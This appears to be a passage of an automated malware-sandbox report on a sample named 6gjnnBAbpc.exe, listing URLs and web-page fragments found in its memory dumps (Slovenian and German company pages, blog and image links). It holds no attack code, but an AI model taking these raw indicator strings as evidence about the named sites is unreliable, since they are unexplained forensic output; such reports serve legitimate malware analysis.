                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.facebook.com (Facebook)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Elpro Lepenik proizvodnja temperaturnih tipal in merilno regulacijska tehnika","publisher":{"@id":"https://www.elpro.si/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.elpro.si/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"sl-SI"},{"@type":"Organization","@id":"https://www.elpro.si/#organization","name":"ELPRO","url":"https://www.elpro.si/","logo":{"@type":"ImageObject","inLanguage":"sl-SI","@id":"https://www.elpro.si/#/schema/logo/image/","url":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","contentUrl":"https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg","width":1,"height":1,"caption":"ELPRO"},"image":{"@id":"https://www.elpro.si/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/elprolepenik/","https://www.linkedin.com/company/elpro-lepenik/about/"]}]}</script> equals www.linkedin.com (Linkedin)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <div class="mfn-main-slider mfn-layer-slider"><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript">jQuery(function() { _initLayerSlider( '#layerslider_78_164tu0cttw28r', {createdWith: '6.5.8', sliderVersion: '7.5.3', pauseOnHover: 'enabled', skin: 'v6', sliderFadeInDuration: 350, globalBGSize: 'cover', hoverPrevNext: false, navStartStop: false, showCircleTimer: false, useSrcset: true, skinsPath: 'http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/skins/', performanceMode: true}); });</script><div id="layerslider_78_164tu0cttw28r" class="ls-wp-container fitvidsignore" style="width:1980px;height:400px;margin:0 auto;margin-bottom: 0px;"><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="2000" height="667" src="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg" class="ls-bg" alt="COMS.I.T. - Auf einen Blick" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg 2000w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-300x100.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-768x256.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-1024x342.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-260x87.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-50x17.jpg 50w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-150x50.jpg 150w" sizes="(max-width: 2000px) 100vw, 2000px" /><ls-layer style="font-size:36px;color:#000;text-align:left;font-style:normal;text-decoration:none;text-transform:none;font-weight:400;letter-spacing:0px;background-position:0% 0%;background-repeat:no-repeat;top:38px;left:945px;width:560px;height:309px;" class="ls-l ls-media-layer"><iframe width="560" height="315" frameborder="0" allowfullscreen data-src="https://www.youtube.com/embed/e1ZfpowjQRo"></iframe></ls-layer></div><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="1980" height="726" src="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg" class="ls-bg" alt="" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg 1980w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-300x110.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-768x282.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-1024x375.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-260x95.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-50x18.jpg 50w, https://www.com-sit.com/wp-content/uploa
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <div class="mfn-main-slider mfn-layer-slider"><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript">jQuery(function() { _initLayerSlider( '#layerslider_78_4aoo8sib60q9', {createdWith: '6.5.8', sliderVersion: '7.5.3', pauseOnHover: 'enabled', skin: 'v6', sliderFadeInDuration: 350, globalBGSize: 'cover', hoverPrevNext: false, navStartStop: false, showCircleTimer: false, useSrcset: true, skinsPath: 'http://www.com-sit.com/wp-content/plugins/LayerSlider/assets/static/layerslider/skins/', performanceMode: true}); });</script><div id="layerslider_78_4aoo8sib60q9" class="ls-wp-container fitvidsignore" style="width:1980px;height:400px;margin:0 auto;margin-bottom: 0px;"><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="2000" height="667" src="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg" class="ls-bg" alt="COMS.I.T. - Auf einen Blick" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK.jpg 2000w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-300x100.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-768x256.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-1024x342.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-260x87.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-50x17.jpg 50w, https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_01_AUF-EINEN-BLICK-150x50.jpg 150w" sizes="(max-width: 2000px) 100vw, 2000px" /><ls-layer style="font-size:36px;color:#000;text-align:left;font-style:normal;text-decoration:none;text-transform:none;font-weight:400;letter-spacing:0px;background-position:0% 0%;background-repeat:no-repeat;top:38px;left:945px;width:560px;height:309px;" class="ls-l ls-media-layer"><iframe width="560" height="315" frameborder="0" allowfullscreen data-src="https://www.youtube.com/embed/e1ZfpowjQRo"></iframe></ls-layer></div><div class="ls-slide" data-ls="duration:7000;kenburnsscale:1.2;"><img width="1980" height="726" src="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg" class="ls-bg" alt="" decoding="async" srcset="https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg 1980w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-300x110.jpg 300w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-768x282.jpg 768w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-1024x375.jpg 1024w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-260x95.jpg 260w, https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-50x18.jpg 50w, https://www.com-sit.com/wp-content/uploads
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://2.gravatar.com/avatar/8f1795d9778dd5337c87d22e0464e1c3?s=96&amp;d=mm&amp;r=g
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://SpielautomatenKostenlosSpielen.eu
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://afs.googleusercontent.com/dp-r/common-generic-color-bullet-arrow.gif
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://afs.googleusercontent.com/dp-r/common-generic-color-check.gif
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379986197.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://afs.googleusercontent.com/dp-r/grn_arrow.gif
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.421703966.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.307934959.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijaco/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://blog.goo.ne.jp/baijakujaco
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520195564.0000000005C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.statcounter.com/9484561/0/b0cbab70/1/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cer-slo.si/predstavitev.html
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=L
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.427526856.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.325578885.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://furec.sakura.ne.jp/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gholographic.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 